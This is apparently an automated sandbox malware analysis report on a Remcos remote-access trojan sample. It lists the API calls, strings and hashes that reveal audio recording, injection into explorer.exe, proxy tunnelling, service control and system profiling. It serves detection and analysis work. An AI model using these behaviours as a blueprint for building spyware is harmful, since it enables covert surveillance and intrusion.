                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                    • String ID:
                                                                    • API String ID: 2441525078-0
                                                                    • Opcode ID: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                                                                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                    • Opcode Fuzzy Hash: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                                                                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                    APIs
                                                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                    • TranslateMessage.USER32(?), ref: 0040557E
                                                                    • DispatchMessageA.USER32(?), ref: 00405589
                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                    • API String ID: 2956720200-749203953
                                                                    • Opcode ID: 403e35d5e3f51be9e4abe35e33d525a6e6a776fde8f0677deea20a855936d8b4
                                                                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                    • Opcode Fuzzy Hash: 403e35d5e3f51be9e4abe35e33d525a6e6a776fde8f0677deea20a855936d8b4
                                                                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                    APIs
                                                                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                    • String ID: 0VG$0VG$<$@$Temp
                                                                    • API String ID: 1704390241-2575729100
                                                                    • Opcode ID: c4c6d41c33cfc8338ba3905c6aeda13652c6ee9eb0b03175ba4ea3188b2711b4
                                                                    • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                    • Opcode Fuzzy Hash: c4c6d41c33cfc8338ba3905c6aeda13652c6ee9eb0b03175ba4ea3188b2711b4
                                                                    • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                    • int.LIBCPMT ref: 00410E81
                                                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                    • String ID: ,kG$0kG$@!G
                                                                    • API String ID: 3815856325-312998898
                                                                    • Opcode ID: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                                                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                    • Opcode Fuzzy Hash: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                                                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                    • String ID:
                                                                    • API String ID: 221034970-0
                                                                    • Opcode ID: 7b2cf5faf853fa98289cc991659be0cbca7e258cea3468f32c8f6232fd3e676c
                                                                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                    • Opcode Fuzzy Hash: 7b2cf5faf853fa98289cc991659be0cbca7e258cea3468f32c8f6232fd3e676c
                                                                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00448135
                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                    • _free.LIBCMT ref: 00448141
                                                                    • _free.LIBCMT ref: 0044814C
                                                                    • _free.LIBCMT ref: 00448157
                                                                    • _free.LIBCMT ref: 00448162
                                                                    • _free.LIBCMT ref: 0044816D
                                                                    • _free.LIBCMT ref: 00448178
                                                                    • _free.LIBCMT ref: 00448183
                                                                    • _free.LIBCMT ref: 0044818E
                                                                    • _free.LIBCMT ref: 0044819C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                    APIs
                                                                    • _free.LIBCMT ref: 100059EA
                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                    • _free.LIBCMT ref: 100059F6
                                                                    • _free.LIBCMT ref: 10005A01
                                                                    • _free.LIBCMT ref: 10005A0C
                                                                    • _free.LIBCMT ref: 10005A17
                                                                    • _free.LIBCMT ref: 10005A22
                                                                    • _free.LIBCMT ref: 10005A2D
                                                                    • _free.LIBCMT ref: 10005A38
                                                                    • _free.LIBCMT ref: 10005A43
                                                                    • _free.LIBCMT ref: 10005A51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                    • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                    • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                    • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                                    Strings
                                                                    • DisplayName, xrefs: 0041C73C
                                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                    • API String ID: 1332880857-3614651759
                                                                    • Opcode ID: 1a8a8a53396f0a73c7c7ebd617f4a58ea8be179d7647117c14ca7f9aabbf758a
                                                                    • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                                    • Opcode Fuzzy Hash: 1a8a8a53396f0a73c7c7ebd617f4a58ea8be179d7647117c14ca7f9aabbf758a
                                                                    • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Eventinet_ntoa
                                                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                    • API String ID: 3578746661-3604713145
                                                                    • Opcode ID: b9aa1fab6828d4f59fec17aa7181037e83738a7fa0aabdc3194317fb6ae7373a
                                                                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                    • Opcode Fuzzy Hash: b9aa1fab6828d4f59fec17aa7181037e83738a7fa0aabdc3194317fb6ae7373a
                                                                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                    APIs
                                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                    • Sleep.KERNEL32(00000064), ref: 00417521
                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                    • API String ID: 1462127192-2001430897
                                                                    • Opcode ID: 66583a3860f3b28af2b5555ce20415dd79a42fda8b1849ed51496f68293345f8
                                                                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                    • Opcode Fuzzy Hash: 66583a3860f3b28af2b5555ce20415dd79a42fda8b1849ed51496f68293345f8
                                                                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe), ref: 0040749E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProcess
                                                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                    • API String ID: 2050909247-4242073005
                                                                    • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                    • Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                    APIs
                                                                    • _strftime.LIBCMT ref: 00401D50
                                                                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                    • API String ID: 3809562944-243156785
                                                                    • Opcode ID: c99da5305961975fe68c9c8c9141d97955a6f8890026189d34f6163058dc30d9
                                                                    • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                    • Opcode Fuzzy Hash: c99da5305961975fe68c9c8c9141d97955a6f8890026189d34f6163058dc30d9
                                                                    • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                    • waveInStart.WINMM ref: 00401CFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                    • String ID: dMG$|MG$PG
                                                                    • API String ID: 1356121797-532278878
                                                                    • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                    • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                    • String ID: Remcos
                                                                    • API String ID: 1970332568-165870891
                                                                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                    APIs
                                                                    • AllocConsole.KERNEL32(0%s), ref: 0041CDA4
                                                                    • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
